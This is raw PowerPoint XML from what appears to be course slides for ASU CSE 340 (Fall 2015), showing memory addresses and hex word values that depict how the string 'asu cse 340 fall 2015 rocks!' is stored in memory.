                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20657363)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>asu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20757361)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>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0"/>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1"/>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2"/>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3"/>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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10015"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a: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182</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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0xfd2ac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd2b8</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0xfd2b8</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x804840c</a:t>
                      </a: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277190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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280422" y="-24436"/>
            <a:ext cx="5467428" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048504: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127217413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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>(0x21736b63)</a:t>
                      </a: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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> 201 (0x31303220)</a:t>
                      </a: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5"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>fall (0x6c6c6166)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)</a:t>
                      </a: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7"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20657363)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>asu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20757361)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>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0"/>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1"/>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2"/>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3"/>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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10015"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a: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183</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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0xfd2ac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd2bc</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x6c6c6166</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x804840c</a:t>
                      </a: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18273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277190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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280422" y="-24436"/>
            <a:ext cx="5467428" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048504: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108353102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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>(0x21736b63)</a:t>
                      </a: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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>5 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>ro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x6f722035)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> 201 (0x31303220)</a:t>
                      </a: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5"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>fall (0x6c6c6166)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>340 (0x20303433)</a:t>
                      </a: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7"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>cse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20657363)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>asu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t> (0x20757361)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>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0"/>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1"/>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2"/>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3"/>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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10015"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
